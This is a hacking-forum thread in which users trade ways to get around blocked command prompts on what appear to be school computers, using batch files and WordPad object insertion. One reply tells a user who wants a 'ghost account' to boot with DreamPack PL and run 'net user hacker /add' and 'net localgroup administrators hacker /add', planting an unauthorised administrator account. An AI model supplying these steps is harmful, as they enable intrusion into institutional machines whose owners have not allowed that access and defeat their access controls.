Your very own Command Prompt :)

No explicit questions like "how do I hack xxx.com" please!
User avatar
tecomega42
Newbie
Newbie
Posts: 4
Joined: 25 Feb 2007, 17:00
17

Post by tecomega42 »

a shorter piece of code that worked for me was

Code: Select all

command
then same process just save it first as a .txt then change it to bat file

User avatar
sherlock
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 109
Joined: 12 Jun 2007, 16:00
16
Location: sydney

yeah

Post by sherlock »

Hey..

I knew how to get in to cmd even when it was blocked and mess around with files but how do you get admin acess to the network stuff...:)

User avatar
Big-E
Administrator
Administrator
Posts: 1332
Joined: 16 May 2007, 16:00
16
Location: IN UR ____ , ____ING UR _____ .
Contact:

Post by Big-E »

Please, smarty pants...explain how you gained said access to command prompt, if it was indeed disabled. Share you knowledge rather than telling us you CAN do it.

User avatar
sherlock
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 109
Joined: 12 Jun 2007, 16:00
16
Location: sydney

hey

Post by sherlock »

1. Open Notepad
2. Type in "Command.com" without the commas
3. Save it as batch (.bat)
4. Run it wherever it is Disabled and you will get in easily.

User avatar
shadow1
On the way to fame!
On the way to fame!
Posts: 49
Joined: 11 Jan 2007, 17:00
17
Contact:

Post by shadow1 »

Open word pad..

Go to Insert > Object

Then click Create from file

Then in the space write command.com

There you go

bubzuru
.net coder
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00
17
Contact:

Post by bubzuru »

or just write

cmd.exe

cmd.exe is the newer version of command.com

User avatar
visser
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 472
Joined: 03 Apr 2007, 16:00
17
Location: online
Contact:

Post by visser »

but how do you get admin access???? thats the only thing i cannot figure out. and our school runs on a network so whenever i input whatever it is to see all of the user on the computer it does just that. shows me im using the computer and the admin. but i would like to creat a ghost acount that i can log in with any computer. how would that be done?

bubzuru
.net coder
.net coder
Posts: 700
Joined: 17 Apr 2007, 16:00
17
Contact:

Post by bubzuru »

you cant get admin acces from a limited acount in school but dreampack PL
will giv you an unprotected dos prompt at boot so you can just type

net user hacker /add
net localgroup administrators hacker /add

so all in all dowmload dreampack PL
install it
at boot in the dos prompt type

net user hacker /add
net localgroup administrators hacker /add

easy :twisted:

rhysh
Fame ! Where are the chicks?!
Fame ! Where are the chicks?!
Posts: 767
Joined: 15 Nov 2006, 17:00
17
Contact:

Post by rhysh »

nice one
its better than this one i use

command.com
pause

lol

Post Reply